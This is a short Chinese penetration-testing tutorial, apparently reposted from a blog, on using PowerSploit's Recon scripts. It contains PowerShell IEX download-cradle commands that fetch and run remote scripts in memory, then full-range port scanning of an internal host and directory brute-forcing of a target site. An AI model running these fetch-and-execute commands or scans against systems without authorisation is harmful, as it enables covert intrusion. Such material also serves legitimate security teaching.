POWERSPLOIT-Recon(信息侦察)脚本渗透实战
Recon(信息侦察)模块
a) 调用invoke-Portscan扫描内网主机的端口。
1)通过IEX下载并调用invoke-portscan。
PS C:\Users\Administrator> IEX(New-Object net.webclient).DownloadString("http://192.168.190.141/PowerSploit/Recon/Invoke -Portscan.ps1")
PS C:\Users\Administrator> Invoke-Portscan -Hosts 192.168.190.132 -Ports "1-65535"
b) 调用Get-HttpStatus扫描目标站点的目录。
1)通过IEX下载并调用Get-HttpStatus。
PS C:\Users\Administrator> IEX(New-Object net.webclient).DownloadString("http://192.168.190.141/PowerSploit/Recon/Get-Ht tpStatus.ps1")
PS C:\Users\Administrator> Get-HttpStatus -Target www.xxx.com -Path D:\dic.txt
c) 调用Invoke-ReverseDnsLookup扫描内网主机的ip对应的主机名。
1)通过IEX下载并调用Invoke-ReverseDnsLookup。
PS C:\Users\Administrator> IEX(New-Object net.webclient).DownloadString("http://192.168.190.141/PowerSploit/Recon/Invoke -ReverseDnsLookup.ps1")
PS C:\Users\Administrator> Invoke-ReverseDnsLookup '192.168.190.133'
转载于:https://www.cnblogs.com/-qing-/p/10544271.html
POWERSPLOIT-Recon(信息侦察)脚本渗透实战相关推荐
- PowerSploit-CodeExecution(代码执行)脚本渗透实战
首先介绍一下国外大牛制作的Powershell渗透工具PowerSploit,上面有很多powershell攻击脚本,它们主要被用来渗透中的信息侦察.权限提升.权限维持. 项目地址:https://g ...
- 暗月渗透实战靶场-项目六(上)
暗月渗透实战靶场-项目六 环境搭建 使用的是暗月提供的环境 直接虚拟机运行即可 设置网络环境 网卡配置的时候为了方便直接使用的是暗月的vm19的网卡配置的内网环境 00x1-信息搜集 我们已经知道目标 ...
- (Vulnhub练习)-- fristileaks渗透实战
(Vulnhub练习)-- fristileaks渗透实战 下载地址 http://www.vulnhub.com/entry/fristileaks-13,133/ 目标主机IP:192.168.1 ...
- 【渗透实战】web渗透实战,相对高安全级别下,详细分析整个渗透过程以及介绍社工的巧妙性,拿一站得数十站,(漏洞已交)
''' 版权tanee 转发交流请备注 漏洞已经提交管理员 关键过程的截图和脚本代码已经略去.希望大家学习技术和思路就好,切勿进行违法犯罪的活动.本实战案例仅作为技术分享,切勿在未经许可的任何公网站点 ...
- 【网络安全】2022年第一次靶场渗透实战学习
一.介绍 渗透测试是通过模拟黑客或者骇客攻击,以评估计算机系统或者网络环境安全性的技术:主要的目的是进行安全性的评估,而不是摧毁或者破坏目标系统. 渗透测试所需要的基础技能必须有网络基础.编程基础.数 ...
- 4. Python脚本学习实战笔记四 新闻聚合
4. Python脚本学习实战笔记四 新闻聚合 本篇名言:"人言纷杂,保持自我:工作勤奋,娱乐适度:对待朋友,不玩心术:处理事务,不躁不怒:生活讲究,量入为出:知足常乐,一生幸福!" ...
- 安鸾渗透实战平台综合渗透——SQL注入进阶渗透流程
本次实验的环境由安鸾渗透实战平台搭建 目标是渗透进网站拿到flag 提示flag在服务器根目录 出于学习目的,由于本人也是小白,错误的地方望指点 参考资料: Call-time pass-by-ref ...
- Linux shell 脚本编程-实战篇(三)
继: Linux shell 脚本编程-实战篇(二) 3. 一些小有意思的脚本 3.1 发送消息 3.1.1 功能分析 对于这种简单的脚本,需要的功能不多.涉及的一些命令很常见,下面了解脚本所需的几个 ...
- 渗透实战:dedeCMS任意用户密码重置到内网getshell
渗透实战:dedeCMS任意用户密码重置到内网getshell ## 一.简介 DedeCMS 是一个基于 PHP 和 MySQL 的开源 CMS 系统,它是国内很多网站使用的 CMS 系统之一.在使 ...
最新文章
- 基于requests模块的cookie,session和线程池爬取
- ADO.NET Entity Framework
- VS.NET 2005真是太好用了!
- python字典基础知识点
- 前端学习(2047)vue之电商管理系统电商系统之使用cdn优化打包
- 创业者谈:畏惧失败,但也要拥抱失败
- 怎么进行软件需求分析
- 已为此响应调用getwriter()_远程过程调用(RPC)
- 【ECG实践篇(1)】MIT-BIH数据库数据解析的方法以及使用rdann获取人工标注注释的方法
- 怎样保持下拉菜单截图?如何快速截图截图快捷键
- 腾讯Android开发面试记录,附大厂真题面经
- rono在oracle的作用_ColorOS产品规划总经理爆料预热Reno,这些功能你想要吗?
- JAVA日志记录方法
- win10电脑字体突然变得模糊,很细
- 最大连接数与每ip连接数的限制
- 服务器无线密码是什么原因,有密码为什么连不上wifi
- 房地产基础知识!!!
- 世界上最远的距离 ——泰戈尔
- ReentrantLock
- racket android,RacketGhost | F-Droid - Free and Open Source Android App Repository
热门文章
- cas引出的ABA问题?如何解决?- 理解原子引用、时间戳(版本号)原子引用
- REVERSE-COMPETITION-HGAME2022-Week2
- oracle sparc 服务器系统,OracleSPARC服务器基础.PDF
- CCIE理论-第一篇-SDN概念复习
- 【HDU - 1943】Ball bearings(几何问题)
- 【HDU - 3499】 Flight (单源最短路+优惠问题)
- 1m带宽可以做mysql数据库吗_服务器的1M带宽够用吗?1M网速是多少?
- jsp,div 限制字数,超出部分用省略号代替
- 学习笔记10-C语言-小项目-五子棋
- 操作系统中避免死锁的银行家算法【表面C++实际C语言】一学就废的菜鸡代码